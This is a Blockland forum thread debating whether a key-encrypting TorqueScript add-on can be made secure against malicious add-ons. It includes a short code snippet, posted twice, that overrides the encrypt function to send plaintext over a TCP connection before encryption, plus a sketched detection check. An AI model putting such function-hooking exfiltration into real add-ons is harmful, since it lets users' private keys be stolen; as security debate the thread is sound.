Finding the location of an executed file

[Ipquarx]

I could implement XTEA (a 128-bit block cipher which takes up 50 lines of code max) in a day tops probably.

EDIT: Make that a few, I'd have to whip up some 64-bit arithmetic magic.

[Ad Bot]

[RarwMuffinz]

I could implement XTEA (a 128-bit block cipher which takes up 50 lines of code max) in a day tops probably.

EDIT: Make that a few, I'd have to whip up some 64-bit arithmetic magic.

Please do! At least someone doesn't think this is a complete disaster!

[Lugnut]

pretty sure AES wouldn't break the torquescript computing time bank

[Ipquarx]

Nearly done implementing XTEA, it's much simpler than AES and effectively just as secure :)

[Port]

What stops people from packaging the function that encrypts a value?

[Ipquarx]

Any addon that tries to overwrite it's functions will be easily spotted by a coder.

On top of that that would only affect new keys, and decoding the other keys would then fail, which would cause the mod to notify the user.

So in other words, you'd have to overwrite the mod entirely.

Attention below poster: did you read the rest of my post, not just that one line?

[boodals 2]

Any addon that tries to overwrite it's functions will be easily spotted by a coder.

90% of people who download an add-on wont be coders, and by the time Badspot has fail binned an add-on, they could have access to plenty of keys.


There is no way this add-on can be made secure. Badspot simply will not allow it.

[Lugnut]

Any addon that tries to overwrite it's functions will be easily spotted by a coder.

On top of that that would only affect new keys, and decoding the other keys would then fail, which would cause the mod to notify the user.

So in other words, you'd have to overwrite the mod entirely.

Attention below poster: did you read the rest of my post, not just that one line?

or just put the parent before the malicious code, so the malicious code sends unencrypted data remotely

[Port]

On top of that that would only affect new keys, and decoding the other keys would then fail, which would cause the mod to notify the user.

package MyPackage
{
  function encrypt(%block, ...)
  {
    MyTCPObject.send(%block @ "\r\n");
    return Parent::encrypt(%block, ...);
  }
};

[Ipquarx]

or just put the parent before the malicious code, so the malicious code sends unencrypted data remotely

package MyPackage
{
  function encrypt(%block, ...)
  {
    MyTCPObject.send(%block @ "\r\n");
    return Parent::encrypt(%block, ...);
  }
};

trace(1);
encrypt(%uselessvalue);
trace(0);
%overridden = (insert check for if more than one function was called, i'm pretty sure there's a way to do this);
if(%overridden)
    exec("crypt.cs");
encrypt(%privateinfo);

[Zeblote]

%overridden = (insert check for if more than one function was called, i'm pretty sure there's a way to do this);

There isn't

[Ipquarx]

There isn't

I'd like to see your evidence of this, have you checked everything? Because I don't think you have.

[Port]

I'd like to see your evidence of this, have you checked everything? Because I don't think you have.

The only viable way is setLogMode(1); followed by reading console.log (which I'm pretty convinced that you can't access, so no regardless).

[Ipquarx]

http://forum.blockland.us/index.php?topic=246169.0

Explain why this is possible then pls

[Zeblote]

http://forum.blockland.us/index.php?topic=246169.0

Explain why this is possible then pls

A GuiConsoleCtrl displays console output. No, you cannot access the content in any way.